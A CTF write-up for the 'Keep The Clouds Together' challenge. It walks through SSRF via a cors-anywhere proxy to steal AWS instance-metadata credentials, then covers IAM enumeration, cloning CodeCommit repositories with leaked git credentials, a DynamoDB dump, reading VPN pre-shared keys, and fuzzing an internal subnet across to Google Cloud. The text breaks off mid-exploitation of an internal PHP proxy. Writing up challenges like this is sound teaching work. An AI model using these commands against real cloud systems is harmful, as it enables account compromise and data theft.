Here’s my write-up on Keep The Clouds Together…, yet another cloud challenge with no solves in the STACK the Flags 2020 CTF organized by the Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and more complex than those of the other cloud challenges in the competition, further highlighting the difficulty of penetration testing infrastructures that span multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted on an Amazon S3 bucket named punggol-digital-lock-portal in the ap-southeast-1 region. From the note, we learn that there is an index.html object in the punggol-digital-lock-portal S3 bucket and that we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html: S3 Bucket /index.html

As the note mentioned, the list of affected individuals indeed fails to load.
Let’s take a peek at the JavaScript code included by the webpage:

var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch a JSON response containing the list of affected individuals from 122.248.230.66, an IP address belonging to Amazon Elastic Compute Cloud (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is deployed, allowing us to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that port 8080 is inaccessible, hence the list of victims could not be loaded successfully.
Perhaps the webserver is not even hosted locally!

Since we have identified that the IP address 122.248.230.66 belongs to an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information, such as temporary IAM access keys, from the AWS Instance Metadata Service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for the punggol-digital-lock-service assumed-role user.
Here’s a quick recap on our progress before we continue on: Initial Entrypoint Progress

Enumerating punggol-digital-lock-service Role

I used WeirdAAL (with AWS CLI v1) to automate the enumeration of the actions permitted for the assumed-role user.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use them to access git repositories hosted on AWS CodeCommit, AWS’s source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository definitely sounds more interesting since we know that punggol-digital-lock-cors-server is likely to be the cors-anywhere proxy application, so let’s look at the punggol-digital-lock-api repository first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe that there is an internal hostname punggol-digital-lock.internal and that the application fetches the list of victim users from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code executes ddb.scan() to fetch records with id < 101.

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table, citizens, in DynamoDB. Let’s try to query it and fetch all records with id greater than 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of performing the query operation, let’s try using the scan operation to dump the table contents instead:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is a Node.js application that simply creates a cors-anywhere proxy in index.js:

// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      
<authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance’s VPC has a site-to-site IPsec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing network resources in the Google Cloud VPC network to be accessed from the Amazon VPC network and vice versa.

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that traffic to the subnet 10.240.0.0/24 is routed via the gateway vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected by the VPN tunnel, we can try to connect to hosts on the VPN network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid hosts in 10.240.0.0/24 range from 10.240.0.1 to 10.240.0.254, so we only need to brute-force 254 network hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.
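To illustrate the idea, here is a minimal Node.js sketch of such a scan (an illustrative sketch of my own, assuming Node 18+ for the built-in fetch; the x-requested-with header satisfies cors-anywhere’s requirement mentioned in its help text):

// scan.mjs - probe every host in 10.240.0.0/24 through the cors-anywhere proxy,
// treating anything that answers within 1 second as alive.
const proxy = 'http://122.248.230.66';

for (let i = 1; i <= 254; i++) {
  const target = `http://10.240.0.${i}/`;
  try {
    const res = await fetch(`${proxy}/${target}`, {
      headers: { 'x-requested-with': 'scanner' }, // required by cors-anywhere
      signal: AbortSignal.timeout(1000),          // 1-second timeout per host
    });
    console.log(`${target} responded with HTTP ${res.status}`);
  } catch (e) {
    // timed out or connection refused: treat the host as down
  }
}

In practice, a purpose-built fuzzer is much faster thanks to its concurrency.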

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found a live network host: 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s an HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we had not realised earlier that this network host sits within a Google Cloud VPC, we would figure it out pretty quickly in this next step.

Using the proxy, let’s enter http://localhost as the site and see whether the Internal Web Proxy returns a response for it:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there was an error parsing the supplied URL. Maybe it requires a port number to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

